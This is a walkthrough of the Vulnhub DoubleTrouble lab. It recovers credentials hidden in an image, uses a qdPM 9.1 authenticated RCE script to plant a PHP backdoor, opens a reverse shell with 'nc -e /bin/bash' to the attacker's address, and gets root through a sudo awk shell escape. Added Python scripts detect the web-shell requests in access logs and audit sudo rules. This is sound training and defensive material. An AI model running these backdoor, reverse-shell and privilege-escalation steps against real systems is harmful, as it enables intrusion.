Vulnhub DoubleTrouble Walkthrough
https://www.vulnhub.com/entry/doubletrouble-1,743/
Enumerate the web server on port 80 with gobuster.
```bash
~ gobuster dir -u http://192.168.56.100 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard -o 80.log
===============================================================
/uploads (Status: 301) [Size: 318] [--> http://192.168.56.100/uploads/]
/images (Status: 301) [Size: 317] [--> http://192.168.56.100/images/]
/css (Status: 301) [Size: 314] [--> http://192.168.56.100/css/]
/template (Status: 301) [Size: 319] [--> http://192.168.56.100/template/]
/core (Status: 301) [Size: 315] [--> http://192.168.56.100/core/]
/install (Status: 301) [Size: 318] [--> http://192.168.56.100/install/]
/js (Status: 301) [Size: 313] [--> http://192.168.56.100/js/]
/index.php (Status: 200) [Size: 5814]
/check.php (Status: 200) [Size: 0]
/sf (Status: 301) [Size: 313] [--> http://192.168.56.100/sf/]
/readme.txt (Status: 200) [Size: 470]
/robots.txt (Status: 200) [Size: 26]
/secret (Status: 301) [Size: 317] [--> http://192.168.56.100/secret/]
```
Download doubletrouble.jpg from /secret; stegseek recovers the passphrase and extracts the embedded creds.txt.
```bash
~ stegseek --crack -sf doubletrouble.jpg
StegSeek version 0.5
Progress: 2.00% (2794835 bytes)
[i] --> Found passphrase: "92camaro"
[i] Original filename: "creds.txt"
[i] Extracting to "doubletrouble.jpg.out"
~ mv doubletrouble.jpg.out creds.txt
~ cat creds.txt
otisrush@localhost.com
otis666
```
Search for a qdPM exploit with searchsploit.
```bash
~ searchsploit qdPM
Exploit Title | Path
...
qdPM 9.1 - Remote Code Execution (RCE) (Authenticated) | php/webapps/50175.py ...
```
Use the PoC to upload a backdoor.
```bash
~ python3 50175.py --host 'http://192.168.56.100/' -u otisrush@localhost.com -p otis666
You are not able to use the designated admin account because they do not have a myAccount page.
Backdoor uploaded at - > http://192.168.56.100//uploads/users/?cmd=whoami
```
Check that the backdoor works.
```bash
~ curl 'http://192.168.56.100/uploads/users/148232-backdoor.php?cmd=whoami'
<pre>www-data
</pre>
```
Get a reverse shell.
```bash
~ curl 'http://192.168.56.100/uploads/users/148232-backdoor.php?cmd=nc%20192.168.56.150%201234%20-e%20/bin/bash';
# listener, in a second terminal:
~ nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:53330.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@doubletrouble:/var/www/html/uploads/users$
```
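The two requests above, the `?cmd=whoami` probe and the `nc ... -e /bin/bash` call-out, are exactly what a defender should be able to pick out of the web server's access log. The script below is an added example, not part of this walkthrough and not qdPM code; it assumes Apache's default combined log format and runs over constructed sample lines that mirror the requests made in this walkthrough (the backdoor path and query strings are the page's, the timestamps and user agents are made up).

```python
"""Flag web-shell use in Apache access logs (combined log format).

Added example, not part of the original walkthrough or of qdPM. It
assumes the default "combined" LogFormat; the sample lines below are
constructed to mirror the requests made in the walkthrough.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample log: the backdoor path and query strings are the ones
# from the walkthrough, the timestamps and user agents are made up.
SAMPLE_LOG = """\
192.168.56.150 - - [11/Sep/2021:14:50:01 +0000] "GET /index.php HTTP/1.1" 200 5814 "-" "Mozilla/5.0"
192.168.56.150 - - [11/Sep/2021:14:53:09 +0000] "POST /index.php/myAccount/update HTTP/1.1" 302 0 "-" "python-requests/2.25.1"
192.168.56.150 - - [11/Sep/2021:14:53:30 +0000] "GET /uploads/users/148232-backdoor.php?cmd=whoami HTTP/1.1" 200 21 "-" "curl/7.74.0"
192.168.56.150 - - [11/Sep/2021:14:55:02 +0000] "GET /uploads/users/148232-backdoor.php?cmd=nc%20192.168.56.150%201234%20-e%20/bin/bash HTTP/1.1" 200 0 "-" "curl/7.74.0"
192.168.56.150 - - [11/Sep/2021:14:56:10 +0000] "GET /uploads/users/avatar.png HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Directories that should only ever serve static files.
UPLOAD_PREFIXES = ("/uploads/",)
# Extensions the web server would hand to the PHP interpreter.
SCRIPT_EXTS = (".php", ".phtml", ".phar", ".php5")
# Parameter names commonly used by one-line command shells.
CMD_PARAMS = {"cmd", "c", "exec", "command"}
# Substrings that suggest an outbound shell rather than a harmless probe.
REVERSE_SHELL_MARKERS = ("nc ", "ncat ", "/bin/bash", "/bin/sh", "/dev/tcp/", "bash -i")


def analyse_line(line):
    """Return the findings for one log line (empty list when it looks clean)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    target = urlsplit(m.group("target"))
    path = target.path
    # Only scripts served out of an upload directory are interesting here.
    if not (path.startswith(UPLOAD_PREFIXES) and path.lower().endswith(SCRIPT_EXTS)):
        return []
    findings = [f"script executed from upload dir: {path}"]
    params = parse_qs(target.query)  # parse_qs percent-decodes the values
    for name in sorted(CMD_PARAMS & set(params)):
        for value in params[name]:
            findings.append(f"command parameter {name}={value!r}")
            if any(marker in value for marker in REVERSE_SHELL_MARKERS):
                findings.append(f"reverse-shell pattern in {name}: {value!r}")
    return findings


def scan_log(text):
    """Map (client IP, timestamp) of each suspicious request to its findings."""
    report = {}
    for line in text.splitlines():
        findings = analyse_line(line)
        if findings:
            m = LOG_RE.match(line)
            report[(m.group("ip"), m.group("ts"))] = findings
    return report


if __name__ == "__main__":
    for (ip, ts), findings in scan_log(SAMPLE_LOG).items():
        print(f"{ts} {ip}")
        for finding in findings:
            print("    " + finding)
```

Running it reports the two backdoor requests and ignores the avatar.png request under /uploads/, because only script extensions count. The first condition in `analyse_line` is also the durable fix stated as a rule: nothing under /uploads/ should ever be executed by the server, so any hit there is worth an alert regardless of the query string.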
Check sudo -l.
```bash
www-data@doubletrouble:/home$ ls -la
ls -la
total 8
drwxr-xr-x 2 root root 4096 Sep 11 13:51 .
drwxr-xr-x 18 root root 4096 Dec 17 2020 ..
www-data@doubletrouble:/home$ sudo -l
sudo -l
Matching Defaults entries for www-data on doubletrouble:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on doubletrouble:
(ALL : ALL) NOPASSWD: /usr/bin/awk
```
Get root.
```bash
www-data@doubletrouble:/home$ sudo awk 'BEGIN {system("/bin/sh")}'
sudo awk 'BEGIN {system("/bin/sh")}'
# id;hostname
id;hostname
uid=0(root) gid=0(root) groups=0(root)
doubletrouble
```
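The `sudo -l` output above is the kind of rule a sudoers review should catch before anyone reaches it: a NOPASSWD entry for awk, whose built-in system() makes it a root shell. The script below is an added example, not part of this walkthrough; it parses `sudo -l` output in the format captured above (the sample is that output, reproduced as a constructed string) and flags rules that run as root or ALL with an unrestricted command or a binary that has a shell escape. Its SHELL_CAPABLE list is a hand-picked subset and is an assumption, not an authoritative catalogue.

```python
"""Audit `sudo -l` output for rules that amount to a root shell.

Added example, not part of the original walkthrough. It parses the text
that `sudo -l` prints (the format captured above). SHELL_CAPABLE is a
hand-picked subset of binaries with a shell escape, an assumption rather
than an authoritative list.
"""
import re

# Constructed sample: the rule is the one from the walkthrough's sudo -l output.
SAMPLE_SUDO_L = """\
Matching Defaults entries for www-data on doubletrouble:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User www-data may run the following commands on doubletrouble:
    (ALL : ALL) NOPASSWD: /usr/bin/awk
"""

# Binaries whose ordinary features let the caller run arbitrary commands
# (awk's system(), editors' :! escapes, pagers' ! escapes, find -exec, ...).
SHELL_CAPABLE = {
    "awk", "gawk", "mawk", "nawk", "perl", "python", "python3", "ruby",
    "vi", "vim", "less", "more", "man", "find", "env", "bash", "sh", "dash",
}

# "(runas) TAG: TAG: command, command": runas list, optional tags, command list.
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_rules(text):
    """Yield (runas_user, tags, command) for every rule after the 'may run' header."""
    in_rules = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        # "(ALL : ALL)" is user-list : group-list; only the user part matters here.
        runas_user = m.group("runas").split(":")[0].strip()
        tags = {t.rstrip(":") for t in re.findall(r"[A-Z]+:", m.group("tags"))}
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            if cmd:
                yield runas_user, tags, cmd


def audit(text):
    """Return one finding per rule that hands root-level command execution to the user."""
    findings = []
    for runas_user, tags, cmd in parse_rules(text):
        if runas_user not in ("ALL", "root"):
            continue  # rules that cannot reach root are out of scope here
        reasons = []
        if cmd == "ALL":
            reasons.append("unrestricted command set")
        else:
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            if binary in SHELL_CAPABLE:
                reasons.append(f"{binary} can spawn a shell")
        if not reasons:
            continue
        if "NOPASSWD" in tags:
            reasons.append("no password required")
        findings.append({"runas": runas_user, "command": cmd, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_SUDO_L):
        print(f"({f['runas']}) {f['command']}: " + "; ".join(f["reasons"]))
```

On the sample it reports the awk rule with both reasons. A rule such as `(root) /usr/bin/systemctl restart nginx` produces no finding, since the binary has no shell escape; the point of the check is that restricting sudo to a "harmless" binary is only as strong as that binary's own feature set.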